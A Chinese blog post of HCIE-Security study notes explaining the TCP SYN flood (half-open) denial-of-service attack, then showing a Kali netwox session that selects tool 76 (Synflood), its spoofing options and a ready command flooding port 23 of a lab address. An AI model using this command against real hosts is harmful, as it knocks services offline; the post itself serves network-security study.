HCIE-Security安全-SYN攻击(半开攻击)

最新推荐文章于 2024-01-23 10:38:47 发布
最新推荐文章于 2024-01-23 10:38:47 发布
阅读量362 收藏
点赞数
分类专栏: HCIE安全 文章标签: 安全 网络 tcpip
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_44667101/article/details/105056526
版权

文章目录

SYN攻击

SYN包:表示连接请求。

攻击原理

在这里插入图片描述
利用了TCP的三次握手机制,A给B发送SYN数据包,B收到该数据包并给A回复一个SYN+ACK数据包,A收到该数据包不去回复B对上一个数据包的ACK确认,则会造成B一直等待这个ACK确认,从而会消耗B的主机缓存资源

SYN攻击属于拒绝式服务攻击(DOS),如果有成百上千个主机,分布在不同的区域,同时向一个被攻击者发送大量的SYN数据包,这也就是分布式拒绝式服务攻击(DDOS),其破坏量非常之大。

SYN泛滥攻击的netwox工具序号为76

root@kali:/home/kali# netwox
Netwox toolbox version 5.39.0. Netwib library version 5.39.0.

######################## MAIN MENU #########################
 0 - leave netwox
 3 - search tools
 4 - display help of one tool
 5 - run a tool selecting parameters on command line
 6 - run a tool selecting parameters from keyboard
 a + information
 b + network protocol
 c + application protocol
 d + sniff (capture network packets)
 e + spoof (create and send packets)
 f + record (file containing captured packets)
 g + client
 h + server
 i + ping (check if a computer if reachable)
 j + traceroute (obtain list of gateways)
 k + scan (computer and port discovery)
 l + network audit
 m + brute force (check if passwords are weak)
 n + remote administration
 o + tools not related to network
Select a node (key in 03456abcdefghijklmno): b

##################### network protocol #####################
 0 - leave netwox
 1 - go to main menu
 2 - go to previous menu
 3 - search tools
 4 - display help of one tool
 5 - run a tool selecting parameters on command line
 6 - run a tool selecting parameters from keyboard
 a + Ethernet
 b + IP
 c + UDP
 d + TCP
 e + ICMP
 f + ARP
Select a node (key in 0123456abcdef): d

########################### TCP ############################
 0 - leave netwox
 1 - go to main menu
 2 - go to previous menu
 3 - search tools
 4 - display help of one tool
 5 - run a tool selecting parameters on command line
 6 - run a tool selecting parameters from keyboard
 a + TCP spoof
 b + TCP client
 c + TCP server
 d + network audit using TCP
 e + dns
 f + ftp
 g + http
 h + ident
 i + irc
 j + nntp
 k + smb
 l + smtp
 m + telnet
 n + whois
Select a node (key in 0123456abcdefghijklmn): d

################# network audit using TCP ##################
 0 - leave netwox
 1 - go to main menu
 2 - go to previous menu
 3 - search tools
 4 - display help of one tool
 5 - run a tool selecting parameters on command line
 6 - run a tool selecting parameters from keyboard
 a - 76:Synflood
 b - 77:Check if seqnum are predictible
 c - 78:Reset every TCP packet
 d - 79:Acknowledge every TCP SYN
Select a node (key in 0123456abcd): a

################# help for tool number 76 ##################
Title: Synflood
+------------------------------------------------------------------------+
| This tool sends a lot of TCP SYN packets.                              |
| It permits to check how a firewall behaves when receiving packets      |
| which have to be ignored.                                              |
| Parameter --spoofip indicates how to generate link layer for spoofing. |
| Values 'best', 'link' or 'raw' are common choices for --spoofip. Here  |
| is the list of accepted values:                                        |
|  - 'raw' means to spoof at IP4/IP6 level (it uses system IP stack). If |
|    a firewall is installed, or on some systems, this might not work.   |
|  - 'linkf' means to spoof at link level (currently, only Ethernet is   |
|    supported). The 'f' means to Fill source Ethernet address.          |
|    However, if source IP address is spoofed, it might be impossible    |
|    to Fill it. So, linkf will not work: use linkb or linkfb instead.   |
|  - 'linkb' means to spoof at link level. The 'b' means to left a Blank |
|    source Ethernet address (0:0:0:0:0:0, do not try to Fill it).       |
|  - 'linkfb' means to spoof at link level. The 'f' means to try to Fill |
|    source Ethernet address, but if it is not possible, it is left      |
|    Blank.                                                              |
|  - 'rawlinkf' means to try 'raw', then try 'linkf'                     |
|  - 'rawlinkb' means to try 'raw', then try 'linkb'                     |
|  - 'rawlinkfb' means to try 'raw', then try 'linkfb'                   |
|  - 'linkfraw' means to try 'linkf', then try 'raw'                     |
|  - 'linkbraw' means to try 'linkb', then try 'raw'                     |
|  - 'linkfbraw' means to try 'linkfb', then try 'raw'                   |
|  - 'link' is an alias for 'linkfb'                                     |
|  - 'rawlink' is an alias for 'rawlinkfb'                               |
|  - 'linkraw' is an alias for 'linkfbraw'                               |
|  - 'best' is an alias for 'linkraw'. It should work in all cases.      |
|                                                                        |
| This tool may need to be run with admin privilege in order to spoof.   |
+------------------------------------------------------------------------+
Usage: netwox 76 -i ip -p port [-s spoofip]
Parameters:
 -i|--dst-ip ip                 destination IP address {5.6.7.8}
 -p|--dst-port port             destination port number {80}
 -s|--spoofip spoofip           IP spoof initialization type {linkbraw}
Example: netwox 76 -i "5.6.7.8" -p "80"
Example: netwox 76 --dst-ip "5.6.7.8" --dst-port "80"
Press 'r' or 'k' to run this tool, or any other key to continue
攻击代码

sudo netwox 76 -i 192.168.248.128 -p 23
//攻击目标服务器的特定端口

在这里插入图片描述

效果

发送完这条指令后,我的电脑风扇也已经开始使劲的吹了,赶紧关了关了^ - ^

影子&
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Wireshark 网络问题定位与排查企业级实战
悦分享
11-07 6597
让我们具体看一下重传、重复ACK和滑动窗口机制。下面是处理延迟问题的一些注意事项。1. 重传数据包发生重传是因为客户端检测到服务器没有接收到它发送的数据。因此,能否看到重传取决于你在分析通信的哪一端。如果你从服务器那端捕获数据,并且它确实没有接收到客户端发送、重传的数据包,那你将被蒙在鼓里,因为你看不到重传的数据包。如果你怀疑服务器那端受到了数据包丢失的影响,(可能的话)你应该考虑在客户端那边捕获流量以观察是否有重传数据包。2. 重复ACK数据包。
Netwox网络工具使用详解
悦分享
01-03 1398
一个好的辅助工具可以起到事半功倍的效果。netwox是由lauconstantin开发的一款网络工具集,适用群体为网络管理员。它可以创造任意的TCP、UDP和IP数据报文,以实现网络欺骗。它可以在命令模式下使用,也可以在GUI中使用netwag调用。该工具包含了超过200个不同的功能,这里被称为模块。每个模块都有一个特定的编号,使用不同的编号模块来实现不同的功能。netwox工具支持在Linux和Windows系统中运行。
netwox网络工具的使用【网络工程】(保姆级图文)
MZH
06-28 1719
netwox网络工具的使用【网络工程】(保姆级图文)
华为HCIE-Security考试心得
热门推荐
曹世宏的博客
10-02 4万+
HCIE考试心得 在此记录下我的HCIE成长之路。从2016年刚上大学对网络的一无所知,到2019-09-09一次通过HCIE-Security认证的一次记录与总结。 也是对我一个阶段的一次学习总结。 对HCIE的认识: 因为从小对计算机技术的热爱,特别羡慕那电影里的电脑高手,对着屏幕,可以快速敲击键盘,来控制电脑做各种事情。 大学专业报考了网络工程。还记得从前一直对各种事情都充满了好奇。电话...
HCIE-Security:顺利通过,备考心得
小梁的博客
01-05 3028
备考半年多,终于通过华为HCIE安全,今天把心得贴出来,供大家参考。
HCIE-Security 网络安全专家 V3.0 培训教材及实验手册
最新发布
04-09
HCIE-Security V3.0 考试大纲.pdf HCIE-Security V3.0 实验手册.pdf HCIE-Security V3.0 培训教材.pdf
HCIE-Security V1.5.rar
07-17
内涵HCIE-Security华为认证网络安全精英培训教材V1.5,HCIE-Security华为认证网络安全精英培训实验手册,资料难得,望珍惜!
HCIE-Security V2.0培训PPT.rar
06-21
11 模块二 第七章 DDoS攻击与防御 12 模块二 第八章 主机安全与加固 13 模块二 第九章 数据安全 14 模块三 第一章 典型安全组网设计 15 模块三 第二章 防火墙技术综合应用 16 模块三 第三章 用户管理技术 17 ...
HCIE-Security V2.0 培训教材.rar
04-18
HCIE-Security V2.0 培训教材》是华为认证的顶级专家级课程,专注于网络安全领域的深度学习和实践。此教材涵盖了网络安全的各个方面,旨在培养具备高级网络安全技术能力的专业人士。作为华为认证互联网专家...
HCIE-Security 安全专家 V2.0 培训教材资料合集
04-09
HCIE-Security V2.0 模拟试题.docx HCIE-Security V2.0 培训教材.pdf HCIE-Security V2.0 实验手册.pdf HCIE-Security华为认证网络安全精英培训实验手册.pdf
华为HCIE-Security学习备考资料汇总集
04-07
思科 华三 华为 初中高级教材
HCIE-Security-防火墙文档.zip
07-30
HCIE-Security-防火墙文档
华为HCIE-Security学习备考资料汇总集.rar
08-19
HCIE-Security_Lab备考建议pdf HCIE-Security_备考指南ARP安全配置(S5700交换机.... HCIE-Security_备考指南 DHCP- Snooping(S5700交换...... HCIE-Security备考指南 DSVPN. pdf HCIE-Security备考指南—NAT策略,pdf HCIE-Security备考指南 SSL VPN(SVN). pdf HCIE-Security备考指南—UR过滤pdf HCIE-Security备考指南 安全策略pdf HCIE-Security备考指南—策略路由pdf E-Security.备考指南带管理pdf HCIE-Security备考指南反病毒pdf HCIE- Security备考指南—角色授权&amp认证授权(sVN a HCIE-Securi ty备考指南—接口管理(NP)pdf HClE-Security备考指南—内容过滤pdf HCIE- Security备考指南—双机热备pdf HCIE- Security备考指南—文件过滤pdf 包 HCIE-Security备考指南虚拟网关(SVN)pdf 回 HCIE-Security-备考指南虚找系统pdf HCIE-Security备考指南—应用安全( NIP). pdf HCIE-Security备考指南一应用行为控制pdf HCIE-Security备考指南—用户和认证pdf HCIE-Security备考指南部件过滤pdf HCIE- Security备考指南端安全( SVN). pdf HCIE-Security第试备考建议pdf HCIE-Security面试备考建议pdf
HCIE-Security华为认证网络安全精英培训实验手册
05-02
HCIE-Security华为认证网络安全精英培训实验手册..............................................
HCIE security学习资料
03-22
HCIE security学习资料 案例1双防火墙单Internet出口组网配置
盘点一款强大的网络工具集:Netwox
这家伙很懒,什么都没有留下
01-23 1138
接下来,代码进入一个过滤表达式创建向导,允许用户通过交互方式添加过滤表达式来筛选感兴趣的数据包。在捕获过程中,每当接收到一个数据包时,netwox.packet_callback函数将被调用,对数据包进行处理。在本例中,我们仅将处理函数指定为packet_callback函数,你可以根据自己的需求编写自己的回调函数来处理数据包。在当今数字化的世界中,网络工具集在各行各业都发挥着越来越重要的作用。我们将从其功能、特点、应用场景以及与其他工具的对比等方面进行详细分析,以证明Netwox的强大之处。
基于NETWOX软件的TCP/IP协议栈各协议解读——以太帧、IP协议、ARP协议、ICMP协议【未完,待更新】
weixin_53801131的博客
09-27 1285
参考书籍 《从实践中学习 TCP/IP协议》 大学霸IT达人 编著 基于NETWOX软件的TCP/IP协议栈各协议解读TCP/IP协议栈1. 网络概述1.1 TCP/IP协议层次结构1.2 网络工具集netwox2. 网络接口层/网络访问层2.1 网络访问层的构成2.2 网络体系2.2.1 体系的构成2.2.2 类型2.3 物理地址2.3.1 MAC地址格式2.3.2 查询MAC厂商2.3.3 查看网络主机MAC地址信息2.3.4 根据MAC地址获取主机其他信息2.4 以太网2.4.1 以太网连接2.4.
HCIE-Security Day1:防火墙概述、实验环境搭建、三种方式管理防火墙
小梁的博客
02-09 4278
防火墙了解 路由器、交换机、防火墙是最重要的三类网络设备。 交换机是部署在企业内部,用于实现局域网络互联,vlan划分的功能。路由器是部署在企业网络边缘,实现与其他节点,分支机构或者互联网连接的设备。园区网络内部,一般包含办公区,普通用户的业务一般在这里,数据中心,部署了很多服务器。为了保证企业网络安全性,需要部署防火墙,防火墙一般部署在数据中心的出口、路由器与核心交换机之间,即网络的内外边界,用于防止非法访问和攻*击。 防火墙一般还会旁挂DMZ区,叫做非军事化区,DMZ区中也部署了一些服务器,..
网络工具netwox
QHZDWLL的博客
04-19 1129
netwox## 初始 打开netwox539界面 0:退出netwox工具 3:搜索工具(用来搜索与指定信息相关的模块) 4:显示一个工具的帮助(显示指定模块的帮助信息。) 5:在命令行上运行选择参数的工具(在命令行中输入指定模块的参数选项并运行。) 6:从键盘输入指定模块的参数选项并运行。 a:信息、知识、资料(显示信息) b:网络协议(显示网络协议下相关的模块) c:应用协议(显示应用程序协议下的相关的模块) d:嗅、吸(捕获网络数据包)(显示与嗅探数据包相关的模块) e:行骗、哄骗、戏弄(创建和发
HCIE-Security-备考指南-ARP安全配置(S5700交换机).pdf
02-11
"该文档是HCIE-Security备考指南的一部分,专注于S5700交换机的ARP安全配置。文档涵盖了ARP安全的基础知识,S5700支持的ARP安全特性,以及如何防范各种ARP攻击,包括ARP DOS、ARP欺骗、ARP网关冲突和ARP中间人攻击等...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值